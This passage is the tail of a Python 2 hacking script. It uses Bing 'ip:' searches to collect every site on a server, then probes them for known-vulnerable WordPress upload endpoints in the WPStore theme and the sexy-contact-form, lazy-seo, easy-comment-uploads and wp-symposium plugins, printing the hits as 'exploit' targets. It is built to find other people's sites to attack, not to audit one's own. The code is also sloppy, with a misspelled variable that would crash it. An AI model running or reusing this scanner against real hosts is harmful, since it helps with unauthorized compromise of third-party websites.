1061. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
1062. sites = findwebs
1063. for i in sites :
1064. try :
1065. response = urllib2.urlopen(i).read()
1066. checksqli(i)
1067. except urllib2.HTTPError, e:
1068. str(sites).strip(i)
1069.  
1070. page = page + 10
1071. except :
1072. pass
1073. def checksqli(sqli):
1074. responsetwo = urllib2.urlopen(sqli).read()
1075. find = re.findall('type="file"',responsetwo)
1076. if find:
1077. print(" Found ==> " + sqli)
1078. def sqlscan():
1079. ip = raw_input('Enter IP : ')
1080. grabsqli(ip)
1081. # found this code on stackoverflow.com/questions/19278877
1082. def unique(seq):
1083. seen = set()
1084. return [seen.add(x) or x for x in seq if x not in seen]
1085. def bing_all_grabber(s):
1086. lista = []
1087. page = 1
1088. while page <= 101:
1089. try:
1090. bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
1091. openbing = urllib2.urlopen(bing)
1092. readbing = openbing.read()
1093. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
1094. for i in range(len(findwebs)):
1095. allnoclean = findwebs[i]
1096. findall1 = re.findall('http://(.*?)/', allnoclean)
1097. for idx, item in enumerate(findall1):
1098. if 'www' not in item:
1099. findall1[idx] = 'http://www.' + item + '/'
1100. else:
1101. findall1[idx] = 'http://' + item + '/'
1102. lista.extend(findall1)
1103.  
1104. page += 50
1105. except urllib2.URLError:
1106. pass
1107.  
1108. final = unique(lista)
1109. return final
1110. def check_wordpress(sites) :
1111. wp = []
1112. for site in sites :
1113. try :
1114. if urllib2.urlopen(site+'wp-login.php').getcode() == 200 :
1115. wp.append(site)
1116. except :
1117. pass
1118.  
1119. return wp
1120. def check_wpstorethemeremotefileupload(sites) :
1121. wpstorethemeremotefileupload = []
1122. for site in sites :
1123. try :
1124. if urllib2.urlopen(site+'wp-content/themes/WPStore/upload/index.php').getcode() == 200 :
1125. wpstorethemeremotefileupload.append(site)
1126. except :
1127. pass
1128.  
1129. return wpstorethemeremotefileupload
1130. def check_wpcontactcreativeform(sites) :
1131. wpcontactcreativeform = []
1132. for site in sites :
1133. try :
1134. if urllib2.urlopen(site+'wp-content/plugins/sexy-contact-form/includes/fileupload/index.php').getcode() == 200 :
1135. wpcontactcreativeform.append(site)
1136. except :
1137. pass
1138.  
1139. return wpcontactcreativeform
1140. def check_wplazyseoplugin(sites) :
1141. wplazyseoplugin = []
1142. for site in sites :
1143. try :
1144. if urllib2.urlopen(site+'wp-content/plugins/lazy-seo/lazyseo.php').getcode() == 200 :
1145. wplazyseoplugin.append(site)
1146. except :
1147. pass
1148.  
1149. return wplazyseoplugin
1150. def check_wpeasyupload(sites) :
1151. wpeasyupload = []
1152. for site in sites :
1153. try :
1154. if urllib2.urlopen(site+'wp-content/plugins/easy-comment-uploads/upload-form.php').getcode() == 200 :
1155. wpeasyupload.append(site)
1156. except :
1157. pass
1158.  
1159. return wpeasyupload
1160. def check_wpsymposium(sites) :
1161. wpsymposium = []
1162. for site in sites :
1163. try :
1164. if urllib2.urlopen(site+'wp-symposium/server/file_upload_form.php').getcode() == 200 :
1165. wpsycmium.append(site)
1166. except :
1167. pass
1168.  
1169. return wpsymposium
1170. def wpminiscanner():
1171. ip = raw_input('Enter IP : ')
1172. sites = bing_all_grabber(str(ip))
1173. wordpress = check_wordpress(sites)
1174. wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites)
1175. wpcontactcreativeform = check_wpcontactcreativeform(sites)
1176. wplazyseoplugin = check_wplazyseoplugin(sites)
1177. wpeasyupload = check_wpeasyupload(sites)
1178. wpsymposium = check_wpsymposium(sites)
1179. for ss in wordpress :
1180. print ss
1181. print '[*] Found, ', len(wordpress), ' wordpress sites.'
1182. print '-'*30+'\n'
1183. for ss in wpstorethemeremotefileupload :
1184. print ss
1185. print '[*] Found, ', len(wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.'
1186. print '-'*30+'\n'
1187. for ss in wpcontactcreativeform :
1188. print ss
1189. print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.'
1190. print '-'*30+'\n'
1191. for ss in wplazyseoplugin :
1192. print ss
1193. print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.'
1194. print '-'*30+'\n'
1195. for ss in wpeasyupload :
1196. print ss
1197. print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.'
1198. print '-'*30+'\n'
1199. for ss in wpsymposium :
1200. print ss
1201.  
1202.  
1203. print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.'
1204.  
1205. print '\n'
1206. ############################
1207. #begin :D
1208. if __name__ == "__main__":
1209. menu()